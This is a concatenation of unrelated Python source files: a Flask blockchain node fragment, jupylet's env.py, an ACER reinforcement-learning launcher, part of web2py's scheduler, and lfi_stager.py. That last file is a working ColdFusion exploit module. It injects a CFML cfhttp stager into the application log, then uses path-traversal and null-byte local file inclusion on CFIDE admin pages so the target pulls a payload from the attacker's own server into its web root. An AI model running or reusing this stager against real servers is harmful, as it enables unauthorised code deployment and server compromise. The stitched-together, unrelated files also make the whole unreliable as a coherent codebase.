        return jsonify(message), 201
#add new node sent from connect_to_netwok method and return list of nodes that this node contains
@app.route('/add_new_node', methods = ['POST'])
def add_new_node():
    """Register a node announced by a peer and return our node list (HTTP 201)."""
    payload = request.get_json()
    nodeIp = payload.get('nodeIp')
    nodeName = payload.get('nodeName')
    blockchain.nodes.add(nodeIp)
    print(f'Node connected! {nodeName} with ip {nodeIp}')
    print(f'Network contains the following nodes: {blockchain.nodes}')
    response = {'message': f'Your node is connected to the node {myNodeName} with ip: {myNodeIp}',
                'nodeList': list(blockchain.nodes)
                }
    return jsonify(response), 201
@app.route('/connect_wallet', methods = ['GET'])
def connect_wallet():
    """Pick a random known node for a wallet to connect to (HTTP 201)."""
    #get random node from nodes list
    # NOTE(review): `random` here is numpy.random — the later
    # `from numpy import random` rebinding shadows `import random`;
    # confirm numpy's choice() on a list of strings is intended.
    random_node = random.choice(list(blockchain.nodes))
    response = {'message': f'Your node is connected to the node with ip: {random_node}',
    'node': random_node
    }
    return jsonify(response), 201
@app.route('/add_new_block', methods = ['POST'])
def add_new_block():
    """Append a block broadcast by a peer to the local chain (HTTP 201).

    NOTE(review): the received block is appended WITHOUT any validation
    (no hash/difficulty/linkage check) — any peer can inject arbitrary
    blocks; consider validating before appending.
    """
    block = request.get_json()
    blockchain.chain.append(block)
    print(f'Recieved new block : {block}')
    response = {'message': 'New block added.'
    }
    return jsonify(response), 201
@app.route('/get_balance', methods = ['POST'])
def get_balance():
    """Return the computed balance for the requested sender address (HTTP 201)."""
    payload = request.get_json()
    sender = payload.get('sender')
    balance = blockchain.check_balance(sender)
    return jsonify({'balance': f'{balance}'}), 201
#instantiate blockchain
blockchain = Blockchain()
# Running the app: announce ourselves, sync the chain, start the miner,
# then serve the HTTP API.
connect_to_network()
download_chain()
mining_thread()
app.run(host = '0.0.0.0', port = 5002)
|
env.py | """
jupylet/env.py
Copyright (c) 2020, Nir Aides - nir@winpdb.org
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import functools
import platform
import os
import sys
import multiprocessing as mp
@functools.lru_cache()
def is_remote():
    """Return True when running on a known remote host (Binder or AWS EC2).

    FIX: previously fell through with an implicit None when neither check
    matched; now returns an explicit False (both are falsy, so callers that
    truth-tested the result are unaffected).
    """
    if is_binder_env():
        return True
    if is_aws_linux():
        return True
    return False
def is_aws_linux():
    """Heuristically detect AWS EC2 by grepping DMI identifiers (Linux only).

    Returns True/False on Linux; implicitly returns None on other platforms
    (falsy, so truth-testing callers still work).
    """
    if platform.system() == 'Linux':
        # grep the DMI id files for the EC2 vendor string; stderr discarded
        cmd = 'find /sys/devices/virtual/dmi/id/ -type f | xargs grep "Amazon EC2" 2> /dev/null'
        return 'Amazon' in os.popen(cmd).read()
def is_binder_env():
    """Detect a Binder-hosted environment via the BINDER_REQUEST variable."""
    return os.environ.get('BINDER_REQUEST') is not None
_has_display = None  # cached result of has_display(); None until first call

def has_display():
    """Return a truthy int (1) if a GUI display is available, else 0.

    The probe imports pyglet; when pyglet is not yet imported in this
    process, the probe runs in a child process so that importing pyglet
    (and any display initialisation) cannot affect this process.
    The result is cached in the module-level _has_display.
    """
    global _has_display
    if _has_display is not None:
        return _has_display
    v = mp.Value('i', 0)
    if 'pyglet' in sys.modules:
        # pyglet already loaded here -- probe in-process
        _has_display0(v)
    else:
        p = mp.Process(target=_has_display0, args=(v,))
        p.start()
        p.join()
    _has_display = v.value
    return _has_display
def _has_display0(v):
    """Probe for a display by asking pyglet; set v.value to 1 on success.

    Any failure (pyglet missing, no display) leaves v.value untouched.
    """
    try:
        import pyglet
        pyglet.canvas.get_display()
    except Exception:
        return
    v.value = 1
_xvfb = None  # module-global Xvfb handle; non-None once started

def start_xvfb():
    """Start a virtual framebuffer on Linux (no-op elsewhere or if running).

    Requires the third-party xvfbwrapper package (imported lazily so other
    platforms never need it).
    """
    global _xvfb
    if platform.system() == 'Linux' and _xvfb is None:
        import xvfbwrapper
        _xvfb = xvfbwrapper.Xvfb()
        _xvfb.start()
def is_xvfb():
    """Report whether start_xvfb() has started a virtual framebuffer."""
    return _xvfb is not None
|
main.py | # -*- coding: utf-8 -*-
import argparse
import os
import csv
# import platform
import gym
import torch
from torch import multiprocessing as mp
from model import ActorCritic
from optim import SharedRMSprop
from train import train
from test import test
from utils import Counter
# Command-line interface for the ACER trainer: hyperparameters default to the
# paper's settings; metavars name the corresponding symbol where one exists.
parser = argparse.ArgumentParser(description='ACER')
parser.add_argument('--seed', type=int, default=123, help='Random seed')
parser.add_argument('--num-processes', type=int, default=6, metavar='N', help='Number of training async agents (does not include single validation agent)')
parser.add_argument('--T-max', type=int, default=500000, metavar='STEPS', help='Number of training steps')
parser.add_argument('--t-max', type=int, default=100, metavar='STEPS', help='Max number of forward steps for A3C before update')
parser.add_argument('--max-episode-length', type=int, default=500, metavar='LENGTH', help='Maximum episode length')
parser.add_argument('--hidden-size', type=int, default=32, metavar='SIZE', help='Hidden size of LSTM cell')
parser.add_argument('--model', type=str, metavar='PARAMS', help='Pretrained model (state dict)')
parser.add_argument('--on-policy', action='store_true', help='Use pure on-policy training (A3C)')
parser.add_argument('--memory-capacity', type=int, default=100000, metavar='CAPACITY', help='Experience replay memory capacity')
parser.add_argument('--replay-ratio', type=int, default=4, metavar='r', help='Ratio of off-policy to on-policy updates')
parser.add_argument('--replay-start', type=int, default=20000, metavar='EPISODES', help='Number of transitions to save before starting off-policy training')
parser.add_argument('--discount', type=float, default=0.99, metavar='γ', help='Discount factor')
parser.add_argument('--trace-decay', type=float, default=1, metavar='λ', help='Eligibility trace decay factor')
parser.add_argument('--trace-max', type=float, default=10, metavar='c', help='Importance weight truncation (max) value')
parser.add_argument('--trust-region', action='store_true', help='Use trust region')
parser.add_argument('--trust-region-decay', type=float, default=0.99, metavar='α', help='Average model weight decay rate')
parser.add_argument('--trust-region-threshold', type=float, default=1, metavar='δ', help='Trust region threshold value')
parser.add_argument('--reward-clip', action='store_true', help='Clip rewards to [-1, 1]')
parser.add_argument('--lr', type=float, default=0.0007, metavar='η', help='Learning rate')
parser.add_argument('--lr-decay', action='store_true', help='Linearly decay learning rate to 0')
parser.add_argument('--rmsprop-decay', type=float, default=0.99, metavar='α', help='RMSprop decay factor')
parser.add_argument('--batch-size', type=int, default=16, metavar='SIZE', help='Off-policy batch size')
parser.add_argument('--entropy-weight', type=float, default=0.0001, metavar='β', help='Entropy regularisation weight')
parser.add_argument('--max-gradient-norm', type=float, default=40, metavar='VALUE', help='Gradient L2 normalisation')
parser.add_argument('--evaluate', action='store_true', help='Evaluate only')
parser.add_argument('--evaluation-interval', type=int, default=25000, metavar='STEPS', help='Number of training steps between evaluations (roughly)')
parser.add_argument('--evaluation-episodes', type=int, default=10, metavar='N', help='Number of evaluation episodes to average over')
parser.add_argument('--render', action='store_true', help='Render evaluation agent')
parser.add_argument('--name', type=str, default='results', help='Save folder')
parser.add_argument('--env', type=str, default='CartPole-v1',help='environment name')
if __name__ == '__main__':
    # BLAS setup: keep BLAS single-threaded so async agent processes do not
    # oversubscribe the CPU.
    os.environ['OMP_NUM_THREADS'] = '1'
    os.environ['MKL_NUM_THREADS'] = '1'
    # Setup
    args = parser.parse_args()
    # Creating directories.
    save_dir = os.path.join('results', args.name)
    if not os.path.exists(save_dir):
        os.makedirs(save_dir)
    print(' ' * 26 + 'Options')
    # Saving parameters (echoed to stdout and persisted to params.txt)
    with open(os.path.join(save_dir, 'params.txt'), 'w') as f:
        for k, v in vars(args).items():
            print(' ' * 26 + k + ': ' + str(v))
            f.write(k + ' : ' + str(v) + '\n')
    # args.env = 'CartPole-v1' # TODO: Remove hardcoded environment when code is more adaptable
    # mp.set_start_method(platform.python_version()[0] == '3' and 'spawn' or 'fork') # Force true spawning (not forking) if available
    torch.manual_seed(args.seed)
    T = Counter() # Global shared counter
    gym.logger.set_level(gym.logger.ERROR) # Disable Gym warnings
    # Create shared network (one env instance only to read the spaces)
    env = gym.make(args.env)
    shared_model = ActorCritic(env.observation_space, env.action_space, args.hidden_size)
    shared_model.share_memory()
    if args.model and os.path.isfile(args.model):
        # Load pretrained weights
        shared_model.load_state_dict(torch.load(args.model))
    # Create average network (frozen copy used for trust-region updates)
    shared_average_model = ActorCritic(env.observation_space, env.action_space, args.hidden_size)
    shared_average_model.load_state_dict(shared_model.state_dict())
    shared_average_model.share_memory()
    for param in shared_average_model.parameters():
        param.requires_grad = False
    # Create optimiser for shared network parameters with shared statistics
    optimiser = SharedRMSprop(shared_model.parameters(), lr=args.lr, alpha=args.rmsprop_decay)
    optimiser.share_memory()
    env.close()
    # CSV header for the validation agent's results
    fields = ['t', 'rewards', 'avg_steps', 'time']
    with open(os.path.join(save_dir, 'test_results.csv'), 'w') as f:
        writer = csv.writer(f)
        writer.writerow(fields)
    # Start validation agent (rank 0)
    processes = []
    p = mp.Process(target=test, args=(0, args, T, shared_model))
    p.start()
    processes.append(p)
    if not args.evaluate:
        # Start training agents (ranks 1..num_processes)
        for rank in range(1, args.num_processes + 1):
            p = mp.Process(target=train, args=(rank, args, T, shared_model, shared_average_model, optimiser))
            p.start()
            print('Process ' + str(rank) + ' started')
            processes.append(p)
    # Clean up
    for p in processes:
        p.join()
|
lfi_stager.py | from src.platform.coldfusion.interfaces import CINTERFACES
from src.module.deploy_utils import parse_war_path, _serve, waitServe, killServe
from threading import Thread
from base64 import b64encode
from os.path import abspath
from urllib import quote_plus
from requests import get
from src.core.log import LOG
import state
import utility
title = CINTERFACES.CFM
versions = ['6.0', '7.0', '8.0']
def deploy(fingerengine, fingerprint):
    """ Exploits log poisoning to inject CFML stager code that pulls
    down our payload and stashes it in web root

    Python 2 code (urllib.quote_plus / str-based b64encode). The stager is a
    <cfhttp> tag that fetches our payload (URL passed base64-encoded) and
    writes it two directories up ('Li4vLi4v' is base64 for '../../').
    """
    cfm_path = abspath(fingerengine.options.deploy)
    cfm_file = parse_war_path(cfm_path, True)
    dip = fingerengine.options.ip
    base = 'http://{0}:{1}/'.format(dip, fingerprint.port)
    stager = "<cfhttp method='get' url='#ToString(ToBinary('{0}'))#'"\
             " path='#ExpandPath(ToString(ToBinary('Li4vLi4v')))#'"\
             " file='{1}'>"
    # ensure we're deploying a valid filetype
    extension = cfm_file.rsplit('.', 1)[1]
    if extension.lower() not in ['jsp', 'cfml']:
        utility.Msg("This deployer requires a JSP/CFML payload", LOG.ERROR)
        return
    # start up our local server to catch the request
    server_thread = Thread(target=_serve, args=(cfm_path,))
    server_thread.start()
    # inject stager into the application log via a URL that 404s
    utility.Msg("Injecting stager...")
    b64addr = b64encode('http://{0}:{1}/{2}'.format(utility.local_address(),
                        state.external_port,cfm_file))
    stager = quote_plus(stager.format(b64addr, cfm_file))
    stager += ".cfml" # trigger the error for log injection
    _ = utility.requests_get(base + stager)
    # stager injected, now load the log file via LFI
    # NOTE(review): versions 9.0/10.0 are routed to LinvokeLFI but this
    # module's `versions` list only declares 6.0/7.0/8.0 — confirm intended.
    if fingerprint.version in ["9.0", "10.0"]:
        LinvokeLFI(base, fingerengine, fingerprint)
    else:
        invokeLFI(base, fingerengine, fingerprint)
    if waitServe(server_thread):
        utility.Msg("{0} deployed at /{0}".format(cfm_file), LOG.SUCCESS)
    else:
        utility.Msg("Failed to deploy file.", LOG.ERROR)
    killServe()
def invokeLFI(base, fingerengine, fingerprint):
    """ Invoke the LFI based on the version

    Tries the version-specific application.log path first, then the JRun
    layout. Returns True on success; implicitly returns None otherwise.
    NOTE: the Windows paths rely on sequences like '\\l' not being string
    escapes; keep the backslashes exactly as written.
    """
    ver_dir = { "6.0" : "CFusionMX\logs\\application.log",
                "7.0" : "CFusionMX7\logs\\application.log",
                "8.0" : "ColdFusion8\logs\\application.log",
                "JRun" : "JRun4\servers\cfusion\cfusion-ear\cfusion-war"\
                         "\WEB-INF\cfusion\logs\\application.log"
              }
    # '{0}' is filled with traversal markers by checkURL; '%00en' truncates
    # the locale suffix via null byte
    uri = "/CFIDE/administrator/enter.cfm?locale={0}" + \
          ver_dir[fingerprint.version] + "%00en"
    if checkURL(fingerengine, base + uri, "Severity"):
        return True
    else:
        # try JRun
        uri = "/CFIDE/administrator/enter.cfm?locale={0}" + \
              ver_dir['JRun'] + '%00en'
        if checkURL(fingerengine, base + uri, "Severity"):
            return True
def LinvokeLFI(base, fingerengine, fingerprint):
    """ Currently unsupported; need to turn LFD into LFI

    Probes candidate application.log locations for CF 9/10 on the target
    OS via the l10n.cfm custom tag. Returns True on the first hit;
    implicitly returns None when nothing matches.
    """
    paths = []
    uri = "/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it"\
          "&attributes.file=../../administrator/mail/download.cfm"\
          "&filename={0}&attributes.locale=it&attributes.var=it"\
          "&attributes.jscript=false&attributes.type=text/html"\
          "&attributes.charset=UTF-8&thisTag.executionmode=end"\
          "&thisTag.generatedContent=htp"
    # build OS- and version-specific candidate log paths
    if fingerengine.options.remote_os == 'linux':
        paths.append('opt/coldfusion/cfusion/logs/application.log')
        if fingerprint.version == "9.0":
            paths.append('opt/coldfusion9/cfusion/logs/application.log')
        else:
            paths.append('opt/coldfusion10/cfusion/logs/application.log')
    else:
        paths.append('ColdFusion\logs\\application.log')
        if fingerprint.version == "9.0":
            paths.append('ColdFusion9\logs\\application.log')
            paths.append('ColdFusion9\cfusion\logs\\application.log')
        else:
            paths.append('ColdFusion10\logs\\application.log')
            paths.append('ColdFusion10\cfusion\logs\\application.log')
    for path in paths:
        # leave '{0}' for checkURL to fill with traversal markers
        luri = uri.format("{0}" + path)
        if checkURL(fingerengine, base + luri, 'Severity'):
            print(luri)
            return True
def checkURL(fingerengine, url, keyword):
    """ Inject traversal markers into the URL. Tries depths 7 through 11
    (range(7, 12) excludes 12), as this seems to be the most likely range.

    Returns True when a response contains *keyword*; implicitly returns
    None when no depth works.
    """
    for dots in range(7, 12):
        if fingerengine.options.remote_os == 'linux':
            t_url = url.format("../" * dots)
        else:
            t_url = url.format("..\\" * dots)
        response = utility.requests_get(t_url)
        if response.status_code == 200 and keyword in response.content:
            return True
|
scheduler.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim: set ts=4 sw=4 et ai:
"""
| This file is part of the web2py Web Framework
| Copyrighted by Massimo Di Pierro <mdipierro@cs.depaul.edu>
| License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html)
Background processes made simple
---------------------------------
"""
from __future__ import print_function
import socket
import os
import logging
import types
from functools import reduce
import datetime
import re
import sys
from json import loads, dumps
import tempfile
import traceback
import threading
import multiprocessing
import time
import signal
from gluon import DAL, Field, IS_NOT_EMPTY, IS_IN_SET, IS_NOT_IN_DB, IS_EMPTY_OR
from gluon import IS_INT_IN_RANGE, IS_DATETIME, IS_IN_DB
from gluon.utils import web2py_uuid
from gluon._compat import Queue, long, iteritems, PY2, to_bytes, string_types, integer_types
from gluon.storage import Storage
USAGE = """
## Example
For any existing application myapp
Create File: myapp/models/scheduler.py ======
from gluon.scheduler import Scheduler
def demo1(*args, **vars):
print('you passed args=%s and vars=%s' % (args, vars))
return 'done!'
def demo2():
1/0
scheduler = Scheduler(db, dict(demo1=demo1, demo2=demo2))
## run worker nodes with:
cd web2py
python web2py.py -K myapp
or
python gluon/scheduler.py -u sqlite://storage.sqlite \
-f applications/myapp/databases/ \
-t mytasks.py
(-h for info)
python scheduler.py -h
## schedule jobs using
http://127.0.0.1:8000/myapp/appadmin/insert/db/scheduler_task
## monitor scheduled jobs
http://127.0.0.1:8000/myapp/appadmin/select/db?query=db.scheduler_task.id
## view completed jobs
http://127.0.0.1:8000/myapp/appadmin/select/db?query=db.scheduler_run.id
## view workers
http://127.0.0.1:8000/myapp/appadmin/select/db?query=db.scheduler_worker.id
"""
IDENTIFIER = "%s#%s" % (socket.gethostname(), os.getpid())
logger = logging.getLogger('web2py.scheduler.%s' % IDENTIFIER)
QUEUED = 'QUEUED'
ASSIGNED = 'ASSIGNED'
RUNNING = 'RUNNING'
COMPLETED = 'COMPLETED'
FAILED = 'FAILED'
TIMEOUT = 'TIMEOUT'
STOPPED = 'STOPPED'
ACTIVE = 'ACTIVE'
TERMINATE = 'TERMINATE'
DISABLED = 'DISABLED'
KILL = 'KILL'
PICK = 'PICK'
STOP_TASK = 'STOP_TASK'
EXPIRED = 'EXPIRED'
SECONDS = 1
HEARTBEAT = 3 * SECONDS
MAXHIBERNATION = 10
CLEAROUT = '!clear!'
RESULTINFILE = 'result_in_file:'
CALLABLETYPES = (types.LambdaType, types.FunctionType,
types.BuiltinFunctionType,
types.MethodType, types.BuiltinMethodType)
class Task(object):
    """A unit of work handed from the worker's main thread to the
    executor background process.

    `args` and `vars` travel as json strings; any extra keyword
    argument (task_id, run_id, uuid, ...) is attached to the instance
    as-is.
    """

    def __init__(self, app, function, timeout, args='[]', vars='{}', **kwargs):
        logger.debug(' new task allocated: %s.%s', app, function)
        self.app = app
        self.function = function
        self.timeout = timeout
        self.args = args  # json-encoded positional arguments
        self.vars = vars  # json-encoded keyword arguments
        # extra metadata (task_id, run_id, uuid, ...) attached verbatim
        self.__dict__.update(kwargs)

    def __str__(self):
        return '<Task: %s>' % self.function
class TaskReport(object):
    """Outcome of a task execution, sent back from the executor
    process to the worker's main thread.
    """

    def __init__(self, status, result=None, output=None, tb=None):
        logger.debug(' new task report: %s', status)
        if tb:
            logger.debug(' traceback: %s', tb)
        else:
            logger.debug(' result: %s', result)
        # store the four report fields on the instance
        for attr, value in (('status', status), ('result', result),
                            ('output', output), ('tb', tb)):
            setattr(self, attr, value)

    def __str__(self):
        return '<TaskReport: %s>' % self.status
class JobGraph(object):
    """Experimental: dependencies among tasks."""

    def __init__(self, db, job_name):
        self.job_name = job_name or 'job_0'
        self.db = db

    def add_deps(self, task_parent, task_child):
        """Create a dependency between task_parent and task_child."""
        self.db.scheduler_task_deps.insert(task_parent=task_parent,
                                           task_child=task_child,
                                           job_name=self.job_name)

    def validate(self, job_name=None):
        """Validate that all tasks of job_name can be completed.

        Checks that there are no mutual dependencies among tasks
        (i.e. the dependency graph is acyclic) via a Kahn-style
        topological sort. Commits at the end if successful, or
        rolls back the entire transaction. Handle with care!

        Returns:
            list of sets of task ids, each set runnable in parallel,
            or None if a cycle (or any error) was detected
        """
        db = self.db
        sd = db.scheduler_task_deps
        if job_name:
            q = sd.job_name == job_name
        else:
            q = sd.id  # no filter: validate every recorded dependency
        edges = db(q).select()
        # parent -> set of children adjacency map
        nested_dict = {}
        for row in edges:
            k = row.task_parent
            if k in nested_dict:
                nested_dict[k].add(row.task_child)
            else:
                nested_dict[k] = set((row.task_child,))
        try:
            rtn = []
            for k, v in nested_dict.items():
                v.discard(k)  # Ignore self dependencies
            # children that never appear as parents get an empty dep set;
            # the set() initializer keeps reduce() from raising TypeError
            # on an empty (trivially valid) graph
            extra_items_in_deps = reduce(set.union, nested_dict.values(), set()) - set(nested_dict.keys())
            nested_dict.update(dict((item, set()) for item in extra_items_in_deps))
            # repeatedly peel off the items with no remaining dependencies
            while True:
                ordered = set(item for item, dep in nested_dict.items() if not dep)
                if not ordered:
                    break
                rtn.append(ordered)
                nested_dict = dict(
                    (item, (dep - ordered)) for item, dep in nested_dict.items()
                    if item not in ordered
                )
            # anything left over is part of a cycle
            assert not nested_dict, "A cyclic dependency exists amongst %r" % nested_dict
            db.commit()
            return rtn
        except Exception:
            db.rollback()
            return None
class CronParser(object):
    """Parse a crontab-style line and compute successive run datetimes.

    Args:
        cronline(str): a 5-field cron expression ("min hr dom mon dow"),
            or one of the @yearly/@monthly/... shortcuts
        base(datetime): datetime to start the calculation from;
            defaults to now
    """
    def __init__(self, cronline, base=None):
        self.cronline = cronline
        self.sched = base or datetime.datetime.now()
        self.task = None  # parsed representation, filled lazily by _parse()
    @staticmethod
    def _rangetolist(s, period='min'):
        """Expand a range/step spec ("a-b/c", "a/c", "*..." forms) into a
        list of ints for the given period; returns [] if it doesn't parse.
        """
        if s.startswith('*'):
            # replace the wildcard with the period's full range
            if period == 'min':
                s = s.replace('*', '0-59', 1)
            elif period == 'hr':
                s = s.replace('*', '0-23', 1)
            elif period == 'dom':
                s = s.replace('*', '1-31', 1)
            elif period == 'mon':
                s = s.replace('*', '1-12', 1)
            elif period == 'dow':
                s = s.replace('*', '0-6', 1)
        match = re.match(r'(\d+)-(\d+)/(\d+)', s)
        if match:
            max_ = int(match.group(2)) + 1
            step_ = int(match.group(3))
        else:
            # "a/c" form: step from a up to the period's maximum
            match = re.match(r'(\d+)/(\d+)', s)
            if match:
                ranges_max = dict(min=59, hr=23, mon=12, dom=31, dow=7)
                max_ = ranges_max[period] + 1
                step_ = int(match.group(2))
        if match:
            min_ = int(match.group(1))
            retval = list(range(min_, max_, step_))
        else:
            retval = []
        return retval
    @staticmethod
    def _sanitycheck(values, period):
        """Return True if every value lies in the period's valid range."""
        if period == 'min':
            check = all(0 <= i <= 59 for i in values)
        elif period == 'hr':
            check = all(0 <= i <= 23 for i in values)
        elif period == 'dom':
            # 'l' stands for "last day of the month"
            domrange = list(range(1, 32)) + ['l']
            check = all(i in domrange for i in values)
        elif period == 'mon':
            check = all(1 <= i <= 12 for i in values)
        elif period == 'dow':
            # both 0 and 7 are accepted for sunday
            check = all(0 <= i <= 7 for i in values)
        return check
    def _parse(self):
        """Parse self.cronline into a dict period -> sorted value list.

        Periods left as '*' are simply absent from the dict.
        Raises ValueError on malformed lines.
        """
        line = self.cronline.lower()
        task = {}
        # expand the @shortcuts to their 5-field equivalents
        if line.startswith('@yearly'):
            line = line.replace('@yearly', '0 0 1 1 *')
        elif line.startswith('@annually'):
            line = line.replace('@annually', '0 0 1 1 *')
        elif line.startswith('@monthly'):
            line = line.replace('@monthly', '0 0 1 * *')
        elif line.startswith('@weekly'):
            line = line.replace('@weekly', '0 0 * * 0')
        elif line.startswith('@daily'):
            line = line.replace('@daily', '0 0 * * *')
        elif line.startswith('@midnight'):
            line = line.replace('@midnight', '0 0 * * *')
        elif line.startswith('@hourly'):
            line = line.replace('@hourly', '0 * * * *')
        params = line.strip().split()
        if len(params) < 5:
            raise ValueError('Invalid cron line (too short)')
        elif len(params) > 5:
            raise ValueError('Invalid cron line (too long)')
        daysofweek = {'sun': 0, 'mon': 1, 'tue': 2, 'wed': 3, 'thu': 4,
                      'fri': 5, 'sat': 6}
        monthsofyear = {'jan': 1, 'feb': 2, 'mar': 3, 'apr': 4, 'may': 5,
                        'jun': 6, 'jul': 7, 'aug': 8, 'sep': 9, 'oct': 10,
                        'nov': 11, 'dec': 12}
        for (s, i) in zip(params, ('min', 'hr', 'dom', 'mon', 'dow')):
            if s != '*':
                task[i] = []
                vals = s.split(',')
                for val in vals:
                    if i == 'dow':
                        refdict = daysofweek
                    elif i == 'mon':
                        refdict = monthsofyear
                    # named ranges (e.g. mon-fri) become numeric ranges
                    if i in ('dow', 'mon') and '-' in val and '/' not in val:
                        isnum = val.split('-')[0].isdigit()
                        if isnum:
                            val = '%s/1' % val
                        else:
                            val = '-'.join([str(refdict.get(v, ''))
                                            for v in val.split('-')])
                    if '-' in val and '/' not in val:
                        # plain range: treat as a range with step 1
                        val = '%s/1' % val
                    if '/' in val:
                        task[i] += self._rangetolist(val, i)
                    elif val.isdigit():
                        task[i].append(int(val))
                    elif i in ('dow', 'mon'):
                        if val in refdict:
                            task[i].append(refdict[val])
                    elif i == 'dom' and val == 'l':
                        # keep the "last day of month" marker verbatim
                        task[i].append(val)
                if not task[i]:
                    raise ValueError('Invalid cron value (%s)' % s)
                if not self._sanitycheck(task[i], i):
                    raise ValueError('Invalid cron value (%s)' % s)
                task[i] = sorted(task[i])
        self.task = task
    @staticmethod
    def _get_next_dow(sched, task):
        """Advance sched day-by-day until its weekday is in task['dow']."""
        # isoweekday(): mon=1..sun=7; cron dow: sun=0..sat=6, so map 7 -> 0
        task_dow = [a % 7 for a in task['dow']]
        while sched.isoweekday() % 7 not in task_dow:
            sched += datetime.timedelta(days=1)
        return sched
    @staticmethod
    def _get_next_dom(sched, task):
        """Advance sched day-by-day until its day-of-month matches."""
        if task['dom'] == ['l']:
            # 'l': compute the last day of sched's month
            # instead of calendar.isleap
            try:
                last_feb = 29
                datetime.date(sched.year, 2, last_feb)
            except ValueError:
                last_feb = 28
            lastdayofmonth = [
                31, last_feb, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31
            ]
            task_dom = [lastdayofmonth[sched.month - 1]]
        else:
            task_dom = task['dom']
        while sched.day not in task_dom:
            sched += datetime.timedelta(days=1)
        return sched
    @staticmethod
    def _get_next_mon(sched, task):
        """Advance sched month-by-month until its month is in task['mon']."""
        while sched.month not in task['mon']:
            if sched.month < 12:
                sched = sched.replace(month=sched.month + 1)
            else:
                sched = sched.replace(month=1, year=sched.year + 1)
        return sched
    @staticmethod
    def _getnext_hhmm(sched, task, add_to=True):
        """Advance sched to the next matching hour/minute; when add_to is
        True the search starts one minute after sched."""
        if add_to:
            sched += datetime.timedelta(minutes=1)
        if 'min' in task:
            while sched.minute not in task['min']:
                sched += datetime.timedelta(minutes=1)
        if 'hr' in task and sched.hour not in task['hr']:
            while sched.hour not in task['hr']:
                sched += datetime.timedelta(hours=1)
        return sched
    def _getnext_date(self, sched, task):
        """Return the next date (at midnight) satisfying the dow/dom/mon
        constraints; when both dow and dom are given, the earlier wins."""
        if 'dow' in task and 'dom' in task:
            dow = self._get_next_dow(sched, task)
            dom = self._get_next_dom(sched, task)
            sched = min(dow, dom)
        elif 'dow' in task:
            sched = self._get_next_dow(sched, task)
        elif 'dom' in task:
            sched = self._get_next_dom(sched, task)
        if 'mon' in task:
            sched = self._get_next_mon(sched, task)
        return sched.replace(hour=0, minute=0)
    def next(self):
        """Get next date according to specs."""
        if not self.task:
            self._parse()
        task = self.task
        sched = self.sched
        x = 0
        while x < 1000:  # avoid potential max recursions
            x += 1
            try:
                next_date = self._getnext_date(sched, task)
            except (ValueError, OverflowError) as e:
                raise ValueError('Invalid cron expression (%s)' % e)
            if next_date.date() > self.sched.date():
                # we rolled date, check for valid hhmm
                sched = self._getnext_hhmm(next_date, task, False)
                break
            else:
                # same date, get next hhmm
                sched_time = self._getnext_hhmm(sched, task, True)
                if sched_time.date() > sched.date():
                    # we rolled date again :( -> loop and re-check the date
                    sched = sched_time
                else:
                    sched = sched_time
                    break
        else:
            raise ValueError('Potential bug found, please submit your '
                             'cron expression to the authors')
        self.sched = sched
        return sched
    def __iter__(self):
        """Support iteration."""
        return self
    # Python 3 iterator protocol
    __next__ = next
# The two functions below deal with simplejson decoding strings as unicode,
# especially for the dict decode and its subsequent usage as function keyword
# arguments: under Python 2, unicode variable names won't work!
# Borrowed from http://stackoverflow.com/questions/956867/
def _decode_list(lst):
    """Recursively convert unicode items of a list to bytes (PY2 only);
    on Python 3 the list is returned untouched.
    """
    if not PY2:
        return lst
    decoded = []
    for item in lst:
        if isinstance(item, string_types):
            item = to_bytes(item)
        elif isinstance(item, list):
            item = _decode_list(item)
        decoded.append(item)
    return decoded
def _decode_dict(dct):
    """Recursively convert unicode keys/values of a dict to bytes
    (PY2 only); on Python 3 the dict is returned untouched.
    """
    if not PY2:
        return dct
    decoded = {}
    for key, value in iteritems(dct):
        if isinstance(value, string_types):
            value = to_bytes(value)
        elif isinstance(value, list):
            value = _decode_list(value)
        decoded[to_bytes(key)] = value
    return decoded
def executor(retq, task, outq):
    """The function used to execute tasks in the background process.

    Args:
        retq: multiprocessing queue where the final `TaskReport` is put
        task: the `Task` object to execute
        outq: multiprocessing queue collecting the task's stdout
    """
    logger.debug(' task started')
    class LogOutput(object):
        """Facility to log output at intervals.

        Replaces sys.stdout so everything the task prints is forwarded
        to out_queue; close() restores the original stream.
        """
        def __init__(self, out_queue):
            self.out_queue = out_queue
            self.stdout = sys.stdout  # original stream, restored on close()
            self.written = False
            sys.stdout = self
        def close(self):
            sys.stdout = self.stdout
            if self.written:
                # see "Joining processes that use queues" section in
                # https://docs.python.org/2/library/multiprocessing.html#programming-guidelines
                # https://docs.python.org/3/library/multiprocessing.html#programming-guidelines
                self.out_queue.cancel_join_thread()
        def flush(self):
            # file-like protocol stub; nothing to flush
            pass
        def write(self, data):
            self.out_queue.put(data)
            self.written = True
    # details of the current task, exposed to the executed function
    W2P_TASK = Storage({
        'id': task.task_id,
        'uuid': task.uuid,
        'run_id': task.run_id
    })
    stdout = LogOutput(outq)
    try:
        if task.app:
            from gluon.shell import env, parse_path_info
            from gluon import current
            ## FIXME: why temporarily change the log level of the root logger?
            #level = logging.getLogger().getEffectiveLevel()
